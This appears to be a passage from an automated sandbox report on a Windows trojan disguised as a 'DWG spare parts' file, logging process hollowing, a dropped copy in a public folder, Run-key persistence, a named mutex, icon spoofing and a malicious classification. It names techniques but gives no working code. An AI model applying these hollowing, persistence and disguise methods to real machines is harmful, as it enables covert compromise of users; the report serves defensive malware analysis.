                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: 2_2_027648A2 CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,SetThreadContext,ResumeThread,2_2_027648A2
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: 12_2_028948A4 CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,SetThreadContext,ResumeThread,12_2_028948A4
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: 12_2_02895DE4 Sleep,Sleep,CopyFileA,WinExec,OpenProcess,NtSuspendProcess,ExitProcess,12_2_02895DE4
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: 12_2_0289827F Sleep,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,WinExec,OpenProcess,NtSuspendProcess,ExitProcess,12_2_0289827F
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: 12_2_02898746 Sleep,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,WinExec,OpenProcess,NtSuspendProcess,ExitProcess,12_2_02898746
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: 12_2_028948A2 CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,SetThreadContext,ResumeThread,12_2_028948A2
                Source: DWG spare parts 455RTMGF Model.exeBinary or memory string: OriginalFilename vs DWG spare parts 455RTMGF Model.exe
                Source: DWG spare parts 455RTMGF Model.exe, 00000000.00000003.247695857.000000007FC50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDropbox.exe0 vs DWG spare parts 455RTMGF Model.exe
                Source: DWG spare parts 455RTMGF Model.exe, 00000000.00000002.258811076.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDropbox.exe0 vs DWG spare parts 455RTMGF Model.exe
                Source: DWG spare parts 455RTMGF Model.exe, 00000000.00000003.247877361.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs DWG spare parts 455RTMGF Model.exe
                Source: DWG spare parts 455RTMGF Model.exe, 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs DWG spare parts 455RTMGF Model.exe
                Source: DWG spare parts 455RTMGF Model.exe, 00000000.00000000.247132071.0000000000470000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDropbox.exe0 vs DWG spare parts 455RTMGF Model.exe
                Source: DWG spare parts 455RTMGF Model.exe, 00000000.00000003.247631839.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDropbox.exe0 vs DWG spare parts 455RTMGF Model.exe
                Source: DWG spare parts 455RTMGF Model.exe, 00000000.00000002.258432147.000000000235B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDropbox.exe0 vs DWG spare parts 455RTMGF Model.exe
                Source: DWG spare parts 455RTMGF Model.exe, 00000000.00000003.249248521.000000007F580000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDropbox.exe0 vs DWG spare parts 455RTMGF Model.exe
                Source: DWG spare parts 455RTMGF Model.exeBinary or memory string: OriginalFilenameDropbox.exe0 vs DWG spare parts 455RTMGF Model.exe
                Source: DWG spare parts 455RTMGF Model.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: Uuddcmhn.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: DWG spare parts 455RTMGF Model.exeReversingLabs: Detection: 76%
                Source: DWG spare parts 455RTMGF Model.exeVirustotal: Detection: 54%
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeFile read: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe "C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe"
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess created: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                Source: unknownProcess created: C:\Users\Public\Libraries\Uuddcmhn.exe "C:\Users\Public\Libraries\Uuddcmhn.exe"
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess created: C:\Users\Public\Libraries\Uuddcmhn.exe C:\Users\Public\Libraries\Uuddcmhn.exe
                Source: unknownProcess created: C:\Users\Public\Libraries\Uuddcmhn.exe "C:\Users\Public\Libraries\Uuddcmhn.exe"
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess created: C:\Users\Public\Libraries\Uuddcmhn.exe C:\Users\Public\Libraries\Uuddcmhn.exe
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess created: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess created: C:\Users\Public\Libraries\Uuddcmhn.exe C:\Users\Public\Libraries\Uuddcmhn.exeJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess created: C:\Users\Public\Libraries\Uuddcmhn.exe C:\Users\Public\Libraries\Uuddcmhn.exeJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMDJump to behavior
                Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@9/5@5/3
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_02518252 GetDiskFreeSpaceA,0_2_02518252
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_025245F8 CreateToolhelp32Snapshot,Process32First,lstrcmpiA,CloseHandle,Process32Next,CloseHandle,0_2_025245F8
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-COV1FL
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: Binary string: easinvoker.pdb source: DWG spare parts 455RTMGF Model.exe, DWG spare parts 455RTMGF Model.exe, 00000000.00000003.247877361.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp, DWG spare parts 455RTMGF Model.exe, 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp, DWG spare parts 455RTMGF Model.exe, 00000000.00000002.258351591.000000000231E000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: easinvoker.pdbH source: DWG spare parts 455RTMGF Model.exe, 00000000.00000003.247877361.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp, DWG spare parts 455RTMGF Model.exe, 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp, DWG spare parts 455RTMGF Model.exe, 00000000.00000002.258351591.000000000231E000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_0252C2AC push 0252C318h; ret 0_2_0252C310
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_0252B0E8 push 0252B29Bh; ret 0_2_0252B293
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_0252C0AC push 0252C125h; ret 0_2_0252C11D
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_02525152 push 025251BEh; ret 0_2_025251B6
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_02525154 push 025251BEh; ret 0_2_025251B6
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_0252C144 push 0252C1ECh; ret 0_2_0252C1E4
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_0252C1F8 push 0252C288h; ret 0_2_0252C280
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_02524664 push 025246A2h; ret 0_2_0252469A
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_0251D77C push 0251D7A8h; ret 0_2_0251D7A0
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_0251C700 push ecx; mov dword ptr [esp], edx0_2_0251C705
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_025237A4 push 025237DCh; ret 0_2_025237D4
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_025165FA push 02516657h; ret 0_2_0251664F
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_025165FC push 02516657h; ret 0_2_0251664F
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_02523596 push 02523643h; ret 0_2_0252363B
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_02523598 push 02523643h; ret 0_2_0252363B
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_02516A60 push 02516AA2h; ret 0_2_02516A9A
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_02524B40 push 02524B78h; ret 0_2_02524B70
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_0251CB34 push 0251CF8Ah; ret 0_2_0251CF82
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_02513894 push eax; ret 0_2_025138D0
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_02525910 push ecx; mov dword ptr [esp], edx0_2_02525915
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_0251CE04 push 0251CF8Ah; ret 0_2_0251CF82
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_0251FE90 push 0251FF06h; ret 0_2_0251FEFE
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_0251FF93 push 0251FFE1h; ret 0_2_0251FFD9
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_0251FF94 push 0251FFE1h; ret 0_2_0251FFD9
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: 2_2_0276C2A5 push 0276C318h; ret 2_2_0276C310
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: 2_2_0276C2AC push 0276C318h; ret 2_2_0276C310
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: 2_2_0276B0E8 push 0276B29Bh; ret 2_2_0276B293
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: 2_2_0276C0AC push 0276C125h; ret 2_2_0276C11D
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: 2_2_02765154 push 027651BEh; ret 2_2_027651B6
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: 2_2_02765152 push 027651BEh; ret 2_2_027651B6
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: 2_2_0276C144 push 0276C1ECh; ret 2_2_0276C1E4
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeFile created: C:\Users\Public\Libraries\Uuddcmhn.exeJump to dropped file
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run UuddcmhnJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run UuddcmhnJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Icon mismatch, binary includes an icon from a different legit application in order to fool users
                Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (124).png
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
